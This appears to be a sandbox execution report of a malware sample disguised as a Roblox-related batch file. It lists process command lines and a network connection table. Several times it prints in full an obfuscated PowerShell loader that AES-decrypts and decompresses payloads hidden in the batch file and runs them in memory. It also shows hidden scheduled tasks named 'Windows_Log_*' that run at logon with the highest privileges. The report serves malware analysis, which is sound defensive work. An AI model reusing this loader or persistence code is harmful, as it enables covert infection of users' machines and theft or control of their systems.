"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUM4MjI1OUYtQjVCOC00Q0Q5LTgzMDktQzZDNzcyMTVGMTdEfSIgdXNlcmlkPSJ7OTJFMTVCMTItOTZBQS00NzRGLUIxNTUtRkQwRTFBRTJCRjk5fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InswQzM3MTI3Mi1ERjYyLTQ1N0EtOTdENC01OTU4NTVFNEM5OER9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSIiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE0My41NyIgbmV4dHZlcnNpb249IjEuMy4xNzEuMzkiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjYwMjg3ODIyMjgiIGluc3RhbGxfdGltZV9tcz0iNjkxIi8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{1C82259F-B5B8-4CD9-8309-C6C77215F17D}" /silent
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUM4MjI1OUYtQjVCOC00Q0Q5LTgzMDktQzZDNzcyMTVGMTdEfSIgdXNlcmlkPSJ7OTJFMTVCMTItOTZBQS00NzRGLUIxNTUtRkQwRTFBRTJCRjk5fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins0REMzQ0NEMy0yMDJFLTRENzMtQkYxQi01MjcxNjhBNjI3NkJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSIiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIxMjMuMC42MzEyLjEyMyIgbGFuZz0iZW4iIGJyYW5kPSJHR0xTIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjUiIHN5c3RlbV91cHRpbWVfdGlja3M9IjYwMzI3MjIyODYiLz48L2FwcD48L3JlcXVlc3Q-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\MicrosoftEdge_X64_128.0.2739.42.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\MicrosoftEdge_X64_128.0.2739.42.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\MicrosoftEdge_X64_128.0.2739.42.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=128.0.6613.85 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{D126E497-1619-4429-A32A-9E6C3CB711AC}\EDGEMITMP_1DEDE.tmp\setup.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=128.0.2739.42 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff682f306d8,0x7ff682f306e4,0x7ff682f306f0
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNzEuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUM4MjI1OUYtQjVCOC00Q0Q5LTgzMDktQzZDNzcyMTVGMTdEfSIgdXNlcmlkPSJ7OTJFMTVCMTItOTZBQS00NzRGLUIxNTUtRkQwRTFBRTJCRjk5fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGQTYzNzI0OC0zMjAwLTQ3NDEtQkUyOC04RkU1NkFDRTJDMEJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtyNDUydDErazJUZ3EvSFh6anZGTkJSaG9wQldSOXNialh4cWVVREg5dVgwPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGMzAxNzIyNi1GRTJBLTQyOTUtOEJERi0wMEMzQTlBN0U0QzV9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxMjguMC4yNzM5LjQyIiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSI-PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSI5IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2MTE2MTAyMjMxIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNjExNjI4MjIzNyIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjY0Mjg5NjIzMTYiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiIGRvd25sb2FkZXI9ImJpdHMiIHVybD0iaHR0cDovL21zZWRnZS5mLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2IwZjczMWNlLWY3MDYtNGM4MS05MDZlLWEwNWFhMDM0NzU3ZD9QMT0xNzI1MjI5MDU2JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PVVEOVUyUXpqTVp6JTJmVVRTYmlqc3VEVVpqOTd5QzlRWXpJbUg1aDk1YXZvSTF1YzBKcUsyUFcyOWRqUGRVcU5qYVolMmJiRWFtWkxVdDlaWXpTaDZ5ODNjZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE3Mzc1MDM0NCIgdG90YWw9IjE3Mzc1MDM0NCIgZG93bmxvYWRfdGltZV9tcz0iMjQ4MTciLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NDI5MTMyMzE3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNjQ0MzA4MjMzNiIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iNjg5Mjc2MjI1MiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjYzMDIiIGRvd25sb2FkX3RpbWVfbXM9IjMxMjc0IiBkb3dubG9hZGVkPSIxNzM3NTAzNDQiIHRvdGFsPSIxNzM3NTAzNDQiIHBhY2thZ2VfY2FjaGVfcmVzdWx0PSIwIiBpbnN0YWxsX3RpbWVfbXM9IjQ0OTY1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg
C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe" -app -isInstallerLaunch -clientLaunchTimeEpochMs 0
C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rawr.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lAL1F/0jgpGDUdrCB9R/VtgUZMLl+k/2M82yFQAxHVw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('78Df2bbOLckTe4vDMtKLSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NyrgX=New-Object System.IO.MemoryStream(,$param_var); $UFsaS=New-Object System.IO.MemoryStream; $zlgoj=New-Object System.IO.Compression.GZipStream($NyrgX, [IO.Compression.CompressionMode]::Decompress); $zlgoj.CopyTo($UFsaS); $zlgoj.Dispose(); $NyrgX.Dispose(); $UFsaS.Dispose(); $UFsaS.ToArray();}function execute_function($param_var,$param2_var){ $hXpmy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PGubM=$hXpmy.EntryPoint; $PGubM.Invoke($null, $param2_var);}$omiXY = 'C:\Users\Admin\AppData\Local\Temp\rawr.bat';$host.UI.RawUI.WindowTitle = $omiXY;$DqXlc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($omiXY).Split([Environment]::NewLine);foreach ($nPaSY in $DqXlc) { if ($nPaSY.StartsWith('GUpIghOMRSyPbugAqwug')) { $HNuGm=$nPaSY.Substring(20); break; }}$payloads_var=[string[]]$HNuGm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_307_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_307.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_307.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_307.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lAL1F/0jgpGDUdrCB9R/VtgUZMLl+k/2M82yFQAxHVw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('78Df2bbOLckTe4vDMtKLSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NyrgX=New-Object System.IO.MemoryStream(,$param_var); $UFsaS=New-Object System.IO.MemoryStream; $zlgoj=New-Object System.IO.Compression.GZipStream($NyrgX, [IO.Compression.CompressionMode]::Decompress); $zlgoj.CopyTo($UFsaS); $zlgoj.Dispose(); $NyrgX.Dispose(); $UFsaS.Dispose(); $UFsaS.ToArray();}function execute_function($param_var,$param2_var){ $hXpmy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PGubM=$hXpmy.EntryPoint; $PGubM.Invoke($null, $param2_var);}$omiXY = 'C:\Users\Admin\AppData\Roaming\Windows_Log_307.bat';$host.UI.RawUI.WindowTitle = $omiXY;$DqXlc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($omiXY).Split([Environment]::NewLine);foreach ($nPaSY in $DqXlc) { if ($nPaSY.StartsWith('GUpIghOMRSyPbugAqwug')) { $HNuGm=$nPaSY.Substring(20); break; }}$payloads_var=[string[]]$HNuGm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe
"C:\Program Files (x86)\Roblox\Versions\version-86c3597a87f4495e\RobloxPlayerBeta.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rawr.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lAL1F/0jgpGDUdrCB9R/VtgUZMLl+k/2M82yFQAxHVw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('78Df2bbOLckTe4vDMtKLSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NyrgX=New-Object System.IO.MemoryStream(,$param_var); $UFsaS=New-Object System.IO.MemoryStream; $zlgoj=New-Object System.IO.Compression.GZipStream($NyrgX, [IO.Compression.CompressionMode]::Decompress); $zlgoj.CopyTo($UFsaS); $zlgoj.Dispose(); $NyrgX.Dispose(); $UFsaS.Dispose(); $UFsaS.ToArray();}function execute_function($param_var,$param2_var){ $hXpmy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PGubM=$hXpmy.EntryPoint; $PGubM.Invoke($null, $param2_var);}$omiXY = 'C:\Users\Admin\AppData\Local\Temp\rawr.bat';$host.UI.RawUI.WindowTitle = $omiXY;$DqXlc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($omiXY).Split([Environment]::NewLine);foreach ($nPaSY in $DqXlc) { if ($nPaSY.StartsWith('GUpIghOMRSyPbugAqwug')) { $HNuGm=$nPaSY.Substring(20); break; }}$payloads_var=[string[]]$HNuGm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_532_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_532.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_532.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_532.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lAL1F/0jgpGDUdrCB9R/VtgUZMLl+k/2M82yFQAxHVw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('78Df2bbOLckTe4vDMtKLSg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NyrgX=New-Object System.IO.MemoryStream(,$param_var); $UFsaS=New-Object System.IO.MemoryStream; $zlgoj=New-Object System.IO.Compression.GZipStream($NyrgX, [IO.Compression.CompressionMode]::Decompress); $zlgoj.CopyTo($UFsaS); $zlgoj.Dispose(); $NyrgX.Dispose(); $UFsaS.Dispose(); $UFsaS.ToArray();}function execute_function($param_var,$param2_var){ $hXpmy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PGubM=$hXpmy.EntryPoint; $PGubM.Invoke($null, $param2_var);}$omiXY = 'C:\Users\Admin\AppData\Roaming\Windows_Log_532.bat';$host.UI.RawUI.WindowTitle = $omiXY;$DqXlc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($omiXY).Split([Environment]::NewLine);foreach ($nPaSY in $DqXlc) { if ($nPaSY.StartsWith('GUpIghOMRSyPbugAqwug')) { $HNuGm=$nPaSY.Substring(20); break; }}$payloads_var=[string[]]$HNuGm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | file.io | udp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 45.55.107.24:443 | file.io | tcp |
| PL | 108.138.51.120:443 | www.file.io | tcp |
| US | 8.8.8.8:53 | 24.107.55.45.in-addr.arpa | udp |
| GB | 79.127.237.132:443 | hb.vntsm.com | tcp |
| GB | 79.127.237.132:443 | hb.vntsm.com | tcp |
| US | 8.8.8.8:53 | hb.vntsm.io | udp |
| US | 8.8.8.8:53 | hb-vntsm-com.global.ssl.fastly.net | udp |
| US | 172.67.36.131:443 | hb.vntsm.io | tcp |
| US | 151.101.129.194:443 | hb-vntsm-com.global.ssl.fastly.net | tcp |
| US | 45.55.107.24:443 | file.io | tcp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| BE | 74.125.71.157:443 | stats.g.doubleclick.net | tcp |
| FR | 142.250.201.163:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | 174.20.217.172.in-addr.arpa | udp |
| GB | 79.127.237.132:443 | hb.vntsm.com | tcp |
| US | 104.26.2.70:443 | ad-delivery.net | tcp |
| FR | 216.58.215.34:443 | securepubads.g.doubleclick.net | tcp |
| PL | 108.138.51.69:443 | cdn.exelator.com | tcp |
| PL | 108.138.46.40:443 | c.amazon-adsystem.com | tcp |
| FR | 216.58.215.34:443 | securepubads.g.doubleclick.net | udp |
| IE | 34.254.143.3:443 | mydmp.exelator.com | tcp |
| PL | 108.138.46.40:443 | c.amazon-adsystem.com | tcp |
| PL | 18.66.233.81:443 | config.aps.amazon-adsystem.com | tcp |
| FR | 172.217.20.206:443 | fundingchoicesmessages.google.com | tcp |
| US | 172.67.36.110:443 | cdn.hadronid.net | tcp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| GB | 23.53.174.156:443 | secure.cdn.fastclick.net | tcp |
| US | 104.22.53.86:443 | cdn.id5-sync.com | tcp |
| US | 3.33.220.150:443 | match.adsrvr.org | tcp |
| US | 104.244.42.131:443 | analytics.twitter.com | tcp |
| US | 54.237.163.72:443 | onsite-tag-logs.apps.nielsen.com | tcp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 69.51.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.143.254.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.46.138.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.233.66.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.36.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.174.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.53.22.104.in-addr.arpa | udp |
| FR | 142.250.201.162:443 | cm.g.doubleclick.net | udp |
| NL | 63.215.202.178:443 | proc.ad.cpe.dotomi.com | tcp |
| FR | 172.217.20.206:443 | fundingchoicesmessages.google.com | udp |
| US | 3.33.220.150:443 | match.adsrvr.org | tcp |
| FR | 142.250.178.129:443 | tpc.googlesyndication.com | tcp |
| FR | 172.217.20.206:443 | fundingchoicesmessages.google.com | udp |
| US | 172.67.23.234:443 | id.hadron.ad.gt | tcp |
| US | 104.22.4.69:443 | id.hadron.ad.gt | tcp |
| US | 8.8.8.8:53 | cadmus.script.ac | udp |
| US | 34.102.146.192:443 | oa.openxcdn.net | tcp |
| NL | 178.250.1.3:443 | static.criteo.net | tcp |
| US | 34.96.70.87:443 | invstatic101.creativecdn.com | tcp |
| PL | 18.244.146.68:443 | tags.crwdcntrl.net | tcp |
| IE | 18.200.223.87:443 | s.cpx.to | tcp |
| US | 104.18.167.224:443 | pub.doubleverify.com | tcp |
| US | 172.64.152.89:443 | cdn-ima.33across.com | tcp |
| US | 104.18.23.145:443 | cadmus.script.ac | tcp |
| DE | 91.228.74.200:443 | pixel.quantserve.com | tcp |
| DE | 37.252.172.123:443 | ib.adnxs.com | tcp |
| US | 104.18.167.224:443 | pub.doubleverify.com | udp |
| GB | 18.245.187.38:443 | rules.quantcount.com | tcp |
| US | 34.95.69.49:443 | i.clean.gg | tcp |
